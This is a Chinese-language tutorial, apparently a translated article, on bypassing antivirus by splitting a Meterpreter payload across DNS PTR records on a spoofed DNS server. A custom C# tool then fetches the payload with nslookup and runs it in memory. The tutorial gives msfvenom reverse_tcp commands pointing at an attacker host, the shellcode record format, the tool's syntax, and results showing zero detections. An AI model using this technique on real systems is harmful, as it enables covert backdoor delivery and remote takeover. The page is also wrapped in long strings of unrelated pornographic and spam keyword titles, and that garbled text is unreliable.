精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

通過DNS傳輸后門來繞過殺軟

安全 黑客攻防
你不能相信殺軟總是可以防范網絡中攻擊載荷的傳輸,如果通過這種技術或者其他的方法來傳送攻擊載荷的話,哪怕是使用其他協議。

前言

在本篇文章里,我想解釋怎么樣不使用加密數據的方法也能繞過殺軟,同時我也想在github上分享源代碼。https://github.com/DamonMohammadbagher/NativePayload_DNS

我想使用DNS協議來傳輸我的后門載荷,從攻擊者的機器到客戶端機器。這種情況下,我們的后門代碼就不需要是硬編碼的或者加密的了。

因此被殺軟檢測出來的風險就很低了。

為什么是DNS協議?

因為在大多數的網絡里DNS流量都是有效的,IPS/IDS或者硬件防火墻都不會監控和過濾DNS流量。我知道你可以使用SNORT IPS/IDS或者類似的東西來檢測DNS流量,但是在DNS流量里使用特征檢測出新的載荷非常困難。當然網絡管理員也有可能這么做。

本篇文章我想給你展示一個在DNS的請求和回應流量里隱藏你的載荷的方法。

漏洞點在哪兒呢?

如果你想要在后門文件中利用非加密或者無硬編碼的攻擊負荷,比如現在這種情況,你需要利用像http,DNS ...這樣的網絡協議把攻擊負荷從你的系統傳送到目標機上。這種情況下,我們想通過DNS協議傳送攻擊負荷,并同時在目標機器的內存里執行這些攻擊載荷。因此漏洞點在于攻擊載荷的位置,還在于殺軟檢測惡意樣本的方式。因為在這種情況下,我們不會保存攻擊載荷到文件系統,載荷只是在內存里,流量里。

很不幸運的是,各種殺軟為檢測惡意代碼,監控網絡流量,監控及掃描內存的,卻不是很有效。甚至大多數殺軟不管是否有IPS/IDS特性,都是根本無效的。

例子:后門載荷隱藏在擁有PTR記錄和A記錄的DNS域中。

圖 1:DNS域(IP地址到DNS全稱域名)

注:圖片一的紅色翻譯:

第一行:Meterpreter載荷的第一行數據 {載荷}.1.com

左下方:時間設置,后門核心代碼每十分鐘重連一次攻擊者,每5分鐘建立一次連接。1.1.{10}.{5}

右下方:繞過比如像Snort對DNS流量的基于特征檢測攻擊載荷的好辦法(可能);-),拆分攻擊載荷到1-5記錄。你可以利用NSLOOKUP來還原這些記錄,每隔一段時間比如(每2分鐘:獲取一個記錄)

正如你所見,這個DNS域中,我有兩個很像是全稱域名的PTR類型的記錄,隱藏了Meterpreter載荷。還有兩個PTR類型的記錄保存了后門重連的時間設置,還有一個A類型的記錄也是保存了時間設置。

拆分載荷數據到記錄! 如果你想繞過防火墻或者IPS/IDS對DNS流量的基于特征的檢測。

拆分的一個好辦法是,把你的攻擊載荷拆分到PTR類型的DNS記錄里,或者其他你可以加密載荷并使用的協議里。這取決于你和你的目標網絡。

正如圖1里,我把Meterpreter載荷的第一行數據拆分到5個記錄里。因此這些記錄里的載荷等于記錄1.1.1.0。

例子: 1.0.1.0 + 1.0.1.1 + 1.0.1.2 + 1.0.1.3 + 1.0.1.4 = 1.1.1.0。

在客戶端,你可以使用其他的工具或者技術,從假冒的DNS服務器獲取還原出這些載荷。不過,我打算利用NSLOOKUP命令行實時獲取,因為我覺得這比較簡單。

在圖片2,我嘗試用NSLOOKUP工具測試假冒的DNS服務器到客戶端的DNS流量。

圖片2:Nslookup命令及DNS流量測試。

注:圖2里的紅色翻譯如下:Meterpreter載荷通過DNS協議傳輸的流量。現在怎么檢測呢?有思路嗎?

現在我要講下,怎么樣在Linux里創建假冒的DNS服務器,以及Meterpreter載荷如何保存拆分到DNS記錄。最后我要利用我的工具NativePayload_DNS.exe來執行這些載荷,并得到一個Meterpreter連接會話。

步驟1:一步步的創建擁有Meterpreter載荷的假冒DNS服務器:

本步驟中,你可以利用Msfvenom創建一個Meterpreter載荷,像圖片4中那樣。并把載荷一行一行的拷貝到dns.txt文件中,然后利用DNSSpoof在Kali Linux中創建一個假冒的DNS服務器。

不過我首先展示EXE模式的Meterpreter載荷,并用所有的殺軟測試,然后你會發現絕大多數殺軟都可以檢測出來。

為什么我要展示著一點呢?

因為我想表明給你看,同一個攻擊載荷,用兩種技術,一是EXE模式,二是DNS傳輸。你會看到殺軟可以檢測出EXE模式的載荷,但是不能檢測出利用第二個技術”DNS傳輸”的載荷。但我們知道這兩種方法是同一個載荷。

例子1 , EXE模式的載荷: msfvenom –-platform windows –arch x86_64 –p windows/x64/meterpreter/reverse_tcp lhost=192-168-1-50 –f exe > /root/Desktop/payload.exe

下邊圖3你會看到,我的EXE模式的載荷被11款殺軟檢測出來了。

圖3:EXE模式的載荷被檢測出來了。

好了,現在該用第二種技術了,生成載荷時使用了C類型。

例2 , 第二種技術DNS流量: msfvenom –-platform windows –arch x86_64 –p windows/x64/meterpreter/reverse_tcp lhost=192-168-1-50 –f c > /root/Desktop/payload.txt

生成payload.txt文件后,必須把載荷拷貝到dns.txt,按照圖4里的格式,一行一行的拷貝。這非常重要,必須保證dns.txt有正確的格式。因為Linu里的Dnsspoof要用到,格式如下:

  1. IP地址 “{載荷}.域.com” 
  2. 1.1.1.0 “0xfc0x480x830xe40xf00xe8.1.com” 
  3. 1.1.1.1“0xbc0xc80x130xff0x100x08.1.com” 

在這種情況下,因為我的C#后門定制化的用到了域名"1.com",我們必須使用這個名稱作為域名。或者像其他"2.com","3.net","t.com",再或者一個字符加".com"作為域名。

所以在這種情況下,IP地址” 1.1.1.x” 里的x就是dns.txt文件里的載荷行數,

  1. 1.1.1.0 --> payload.txt里的0行 --> “{載荷0}.1.com” 
  2. 1.1.1.1 --> payload.txt里的1行  --> “{載荷1}.1.com” 
  3. 1.1.1.2 --> payload.txt里的2行  --> “{載荷2}.1.com” 

圖4:生成假冒的DNS服務器和Meterpreter載荷的步驟1

圖4:生成假冒的DNS服務器和Meterpreter載荷的步驟1

生成后的dns.txt文件應該如下圖5。

圖5:dnsspoof用來假冒DNS服務器的Dns.txt文件

圖5:dnsspoof用來假冒DNS服務器的Dns.txt文件

好了,現在利用dnsspoof在Linux里生成假冒的DNS服務器,像下圖6一樣。

圖6:dnsspoof工具

圖6:dnsspoof工具

在步驟2中,我們需要一個后門,從假冒的DNS服務器下載攻擊載荷,利用的是DNS協議。

在這種情況下,我編寫了C#代碼來干這件事。我的代碼里使用了nslookup.exe發送DNS請求,最終我的代碼捕獲到了DNS PTR類型回應里的后門載荷。

C# 源代碼鏈接: https://github.com/DamonMohammadbagher/NativePayload_DNS

步驟2:

源代碼編譯后,生成的exe,按照如下的命令語法執行:

命令語法: NativePayload_DNS.exe “起始IP地址” 計數 “假冒DNS服務器IP地址”

例如: C:\> NativePayload_DNS.exe “1.1.1.” 34 “192.168.1.50”

起始IP地址:是你PTR記錄里的第一個IP地址,不包含最后一節。對于域名ID { 1 . 1 . 1 . }你需要輸入三個1.作為參數。

計數:是DNS PTR類型記錄的個數,在這種情況下,我們dns.txt 文件里的1.1.1.0 …. 1.1.1.33,所以這個計數是34。

假冒DNS服務器IP地址:是我們或者說是攻擊者的假冒的DNS服務器IP地址,在這種情況下,我們的kali linux ip地址是192-168-1-50。

在執行后門之前,你要記住,必須確保kali linux里的Metasploit監聽在IP地址192-168-1-50。

現在你可以像圖7一樣執行后門了:

NativePayload_DNS.exe 1.1.1. 34 192.168.1.50

圖7:NativePayload_DNS 工具

圖7:NativePayload_DNS 工具

正如圖7里,后門嘗試發送DNS請求IP地址1.1.1.x,并得到了PTR或者FQDN類型記錄的回應。在下一張圖里,你會發現客戶端和假冒DNS服務器之間的網絡流量。

圖8:利用DNS流量傳送Meterpreter載荷

圖8:利用DNS流量傳送Meterpreter載荷

最終34個記錄倒計時完成之后,你會在攻擊者那端得到一個Meterpreter連接會話,像圖9里的。而且不幸的是,我的殺軟沒檢測出來這種技術。我認為大多數的殺軟都無法檢測出來,如果你用其他殺軟測試了這個技術,請在評論里留言告訴我結果,還有哪款殺軟和版本;)。謝謝你伙計。

圖9:利用DNS協議的Meterpreter會話連接

圖9:利用DNS協議的Meterpreter會話連接

你會看到我的殺軟再一次被繞過了;-),這是用所有殺軟掃描我的源代碼的結果,你可以比較圖3和圖10。兩個后門使用同樣的載荷。

 圖 10: NativePayload_DNS (AVs結果 = 0 被檢測)

圖 10: NativePayload_DNS (AVs結果 = 0 被檢測)

下張圖你會看到C#源代碼使用了NSLOOKUP工具的背后究竟發生了什么。

圖11:Nslookup 和 UDP連接

最終你會在tcpview和putty里看到我的Meterpreter會話,見下圖:

圖12:Tcpview以及TCP有效連接,當后門載荷被從假冒的DNS服務器下載下來后。

在圖13里,你同樣可以看到Meterpreter會話:

圖13:Meterpreter會話。

圖13:Meterpreter會話。

一目了然:你不能相信殺軟總是可以防范網絡中攻擊載荷的傳輸,如果通過這種技術或者其他的方法來傳送攻擊載荷的話,哪怕是使用其他協議。你的網絡和客戶端/服務器是很脆弱的。所以請用你自己的殺軟測試這個技術,并分享你的經驗,在評論里留言告訴我(也許這件事我說錯了,也許沒有)。

責任編輯:武曉燕 來源: linkedin
相關推薦

2017-03-21 08:20:11

2019-07-04 22:54:15

防火墻CMP系統安全

2019-02-12 15:39:52

2016-04-26 11:35:53

2011-09-29 20:52:51

百銳防御信息安全

2019-11-12 13:20:43

MAC地址NetworkManaFedora

2019-04-02 09:01:47

CoreDNSDNS污染

2016-03-29 10:08:07

2010-04-27 15:58:28

2020-05-26 10:38:51

安全 黑客Windows

2009-12-28 16:27:43

DNS連接網絡

2009-04-27 23:29:46

2020-08-11 08:25:21

HTTPSSHLinux防火墻

2010-09-13 15:06:36

2010-09-13 14:47:58

2013-12-27 10:37:01

2010-09-13 14:57:29

2010-03-09 08:52:44

2010-04-02 09:44:23

Oracle數據庫

2010-09-13 15:14:03

點贊
收藏

51CTO技術棧公眾號

成人午夜免费在线| 精品国产凹凸成av人网站| 日韩wuma| 国产suv精品一区二区69| 国产精品www.| 亚洲天堂视频在线观看| 三级黄色片免费观看| free性欧美16hd| 国产欧美一区二区精品忘忧草| 国产精品一区久久久| 久久久久久国产精品视频| 亚洲自拍电影| 91精品国产aⅴ一区二区| 国产成人无码a区在线观看视频| 懂色一区二区三区| 成人黄色网址在线观看| 国产欧美日韩免费看aⅴ视频| 免费一级肉体全黄毛片| av在线不卡顿| 亚洲国产精品久久久| 污网站免费在线| 男人久久天堂| 亚洲精品成人在线| 天天爽天天狠久久久| 黄色av中文字幕| 青青国产91久久久久久| 久久久久久伊人| 北条麻妃在线观看视频| 亚洲精品进入| 亚洲第一精品自拍| 蜜桃视频无码区在线观看| 国产成人精品一区二三区在线观看| 亚洲同性gay激情无套| 日本日本精品二区免费| 天天综合网在线| 国产专区综合网| 国产精品国产福利国产秒拍| 日韩伦理在线视频| 一区二区三区四区在线观看国产日韩| 亚洲日韩中文字幕| 久久久久成人精品无码中文字幕| aa亚洲一区一区三区| 欧美色倩网站大全免费| 亚洲成熟丰满熟妇高潮xxxxx| 丝袜中文在线| 樱花影视一区二区| 人人妻人人澡人人爽精品欧美一区| 免费av在线电影| 91麻豆免费在线观看| 精品国产一区二区三区麻豆免费观看完整版| 国产精品高潮呻吟av| 蜜桃av噜噜一区| 国产精品一区二区电影| 波多野结衣在线观看视频| 久久三级视频| 日本欧美中文字幕| 国产无套丰满白嫩对白| 国产精品主播| 日本精品免费观看| 秋霞av一区二区三区| 亚欧成人精品| 国产精品69久久| 亚洲欧美一二三区| 日本不卡在线视频| 国产日韩欧美中文在线播放| 一区二区美女视频| 国内外成人在线视频| 成人一区二区电影| 成人av一区二区三区在线观看| 国产精品一级二级三级| 成人在线视频电影| 香蕉视频911| 国产亚洲欧美激情| 中文字幕不卡每日更新1区2区| 国产在线高清理伦片a| 亚洲激情图片一区| 五月丁香综合缴情六月小说| 成人午夜视屏| 欧美日韩一级视频| 日本55丰满熟妇厨房伦| 国产色噜噜噜91在线精品| 日韩成人在线免费观看| 国产免费看av| 91精品国产91久久久久久密臀| 久久综合久久八八| 国产无码精品久久久| 久久av一区| 成人妇女淫片aaaa视频| 黄色一级大片在线免费看国产一| 97se亚洲国产综合在线| 午夜精品一区二区三区在线观看| a视频在线播放| 亚洲6080在线| 鲁一鲁一鲁一鲁一av| 精品午夜视频| 国产视频在线观看一区二区| 狂野欧美性猛交| 亚洲黄色成人| 成人免费视频网址| 手机av在线免费观看| 欧美国产日韩亚洲一区| 久久久久久久久网| 日韩在线短视频| 精品欧美久久久| 2019男人天堂| 亚洲国产精品第一区二区| 国产国语videosex另类| wwwxxxx国产| 国产目拍亚洲精品99久久精品| 亚洲国产一二三精品无码| 成人性生交大片免费观看网站| 欧美人妇做爰xxxⅹ性高电影| 无码任你躁久久久久久老妇| 清纯唯美亚洲综合一区| 91国产精品视频在线| 国产免费av观看| 久久精品男人的天堂| 国产一区二区四区| 日日夜夜亚洲| 国产一区二区三区中文| 日韩特黄一级片| 国产一区二区网址| 午夜精品短视频| 在线视频超级| 亚洲国产欧美日韩精品| 加勒比婷婷色综合久久| 美日韩一区二区| 免费一区二区三区在在线视频| 日韩欧美一起| 这里只有精品免费| 成人做爰69片免网站| 香蕉国产精品偷在线观看不卡| 99久久国产免费免费| 日本www在线观看视频| 在线欧美一区二区| 在线免费观看黄色小视频| 国内综合精品午夜久久资源| 成人自拍性视频| 一区二区三区视频在线观看视频| 欧美性色视频在线| 中文字幕免费在线播放| 亚洲特级毛片| 国产精品传媒毛片三区| 成年人黄视频在线观看| 在线电影院国产精品| 懂色av粉嫩av浪潮av| 久久久久久久波多野高潮日日| 久久精品国产99精品国产亚洲性色| 青春草视频在线观看| 日韩三级.com| 麻豆亚洲av成人无码久久精品| 国产一区在线精品| 久久久久久久久久久久久国产| 亚洲人成网站在线在线观看| 日韩视频在线一区| 国产免费不卡视频| 亚洲一区二区三区四区在线| 国产伦理在线观看| 在线国产日韩| 欧美大陆一区二区| 亚洲最大网站| 在线观看久久久久久| 亚洲图片中文字幕| 亚洲欧美一区二区三区孕妇| 亚洲天堂网站在线| 欧美日韩一区二区国产| 粉嫩高清一区二区三区精品视频| segui88久久综合| 亚洲韩国日本中文字幕| 午夜影院免费在线观看| 国产婷婷精品av在线| 亚洲欧美日韩精品一区| 午夜精品影院| 久久riav二区三区| 电影在线观看一区二区| 精品激情国产视频| 成人免费视频国产| 黑人巨大精品欧美一区免费视频 | 欧洲精品一区二区三区| 亚洲性无码av在线| 国产精品一区二区三区在线免费观看 | 欧美专区福利免费| 揄拍成人国产精品视频| 国产三级在线观看视频| 精品女厕一区二区三区| 正在播放国产对白害羞| 国产精品456露脸| 亚洲午夜精品久久久久久人妖| av中文字幕一区二区| 91色视频在线观看| 中日韩脚交footjobhd| www.日韩av.com| 手机在线不卡av| 欧美综合亚洲图片综合区| 青青草在线观看视频| 久久综合999| 国产又粗又猛大又黄又爽| 激情综合电影网| 亚洲图片都市激情| 红杏一区二区三区| 国产在线一区二区三区| 男人天堂视频在线观看| 久热精品在线视频| 成人亚洲综合天堂| 亚洲黄色在线看| 国产一区二区三区三州| 精品日本高清在线播放| 成人在线观看小视频| 国产日韩av一区| 91亚洲一线产区二线产区| 日韩电影免费在线看| 青草青青在线视频| 91成人免费| 亚洲精品一区国产精品| 偷窥自拍亚洲色图精选| 91久色国产| 美女视频一区| 日韩免费不卡av| av福利在线导航| 久久久久北条麻妃免费看| 国产原创av在线| 亚洲电影免费观看高清完整版在线 | 久久电影中文字幕| 亚洲成人av资源网| 99视频国产精品免费观看a| 91久久精品一区二区| 国产又爽又黄的视频| 亚洲国产精品嫩草影院| 粉嫩av性色av蜜臀av网站| 国产精品情趣视频| 欧美黄色高清视频| 久久影视一区二区| 亚洲AV无码国产精品| 成人av免费在线观看| 手机看片国产精品| 国产精品一区免费视频| 在线观看免费视频污| 另类小说欧美激情| 午夜久久久精品| 看电视剧不卡顿的网站| 在线观看的毛片| 美腿丝袜亚洲综合| 亚洲精品午夜在线观看| 青青草国产精品亚洲专区无| 精品www久久久久奶水| 亚洲人成免费| 男的插女的下面视频| 亚洲成人原创| a级黄色一级片| 国产日韩欧美一区二区三区在线观看| 97中文字幕在线| 亚洲国产精品第一区二区三区| 日韩激情视频一区二区| 在线成人欧美| 国产在线精品91| 久久九九电影| 日本美女高潮视频| 麻豆精品一区二区综合av| 亚洲天堂2018av| 国产一区二区成人久久免费影院| 免费人成视频在线播放| 国产麻豆精品久久一二三| 性一交一黄一片| 成+人+亚洲+综合天堂| 91视频啊啊啊| 国产日韩欧美一区二区三区乱码 | 九色视频在线播放| 亚洲色图国产精品| av影片在线看| 久久在线观看视频| av蜜臀在线| 国产激情久久久久| 999精品视频在线观看| av一区和二区| 久久不见久久见免费视频7| 亚洲乱码一区二区三区| 中文字幕亚洲精品乱码 | 午夜裸体女人视频网站在线观看| 国产成人中文字幕| 精品国产亚洲一区二区在线观看| 国产精品福利视频| 精品视频日韩| 人妻激情另类乱人伦人妻| 国产精品久久久久久久久久妞妞| 黄色一级二级三级| 国产一区二区三区四区五区美女| 中文在线观看免费视频| 国产日韩欧美电影| 久久成人在线观看| 91福利精品视频| 超碰在线人人干| 这里只有精品视频| gogo高清午夜人体在线| 国产欧美精品久久久| www.成人网| 亚洲看片网站| 99成人在线| 亚洲黄色片免费看| 91碰在线视频| 免费无遮挡无码永久在线观看视频 | 精品一区二区三区四| 91国在线观看| 免费国产羞羞网站视频| 色妞一区二区三区| 一个人www视频在线免费观看| 亚洲中国色老太| av亚洲在线观看| 日韩精品―中文字幕| 国产乱码精品一品二品| jizz18女人高潮| 欧美日韩激情小视频| xxxwww在线观看| 日韩一级裸体免费视频| 午夜激情在线播放| a级国产乱理论片在线观看99| 欧洲三级视频| 国产女女做受ⅹxx高潮| 成人免费视频网站在线观看| 肉色超薄丝袜脚交69xx图片| 欧美视频在线看| 欧美 中文字幕| 免费av一区二区| 电影91久久久| 一区二区三区电影| 日产国产高清一区二区三区| 成年人在线观看av| 亚洲国产sm捆绑调教视频| a天堂在线视频| 久久亚洲电影天堂| 亚洲二区av| 自拍偷拍一区二区三区| 免费成人av资源网| 久久视频精品在线观看| 色一情一乱一乱一91av| 日韩欧美亚洲系列| 91av中文字幕| 三级小说欧洲区亚洲区| 久草热视频在线观看| 成人黄页毛片网站| 国产精品美女毛片真酒店| 日韩免费高清av| 日韩成人伦理| 国产传媒一区二区三区| 韩日精品视频| 日本性生活一级片| 午夜久久久久久电影| 人妻一区二区三区四区| 韩国福利视频一区| 欧美自拍一区| 日本xxxxxxx免费视频| 久久精品亚洲国产奇米99| 三级网站在线播放| 国产午夜精品视频| 欧美视频精品| 最新av在线免费观看| 国产激情视频一区二区三区欧美 | 精品国产乱码久久久久久闺蜜| 在线播放免费av| 超碰97在线播放| 亚洲精品综合| 亚洲av无码国产精品麻豆天美| 在线影院国内精品| 永久免费av在线| 亚洲自拍在线观看| 欧美日韩第一区| 伊人久久一区二区三区| 日韩欧美精品网址| eeuss影院www在线播放| 91色视频在线观看| 国产欧美日本| 美女100%露胸无遮挡| 欧美一区二区黄| free性m.freesex欧美| 日本在线成人一区二区| 狠狠色丁香久久婷婷综| 清纯粉嫩极品夜夜嗨av| 亚洲精品小视频| 亚洲高清影院| 久久综合久久网| 久久久久久久久99精品| 国产又粗又猛又爽又黄91| 高清欧美性猛交xxxx黑人猛交| 欧美猛男做受videos| 日韩av影视大全| 日韩欧美国产黄色| 麻豆视频免费在线观看| 国产亚洲二区| 蜜乳av一区二区三区| 日本三级视频在线| 伊人精品在线观看| 哺乳挤奶一区二区三区免费看| 北条麻妃在线一区| 亚洲精品美腿丝袜| 男女视频在线观看| 91亚洲精品丁香在线观看| 男人的天堂亚洲在线| 精品国产欧美日韩不卡在线观看 | 国产精品一区二区三区观看| 日产欧产美韩系列久久99| 男人天堂中文字幕|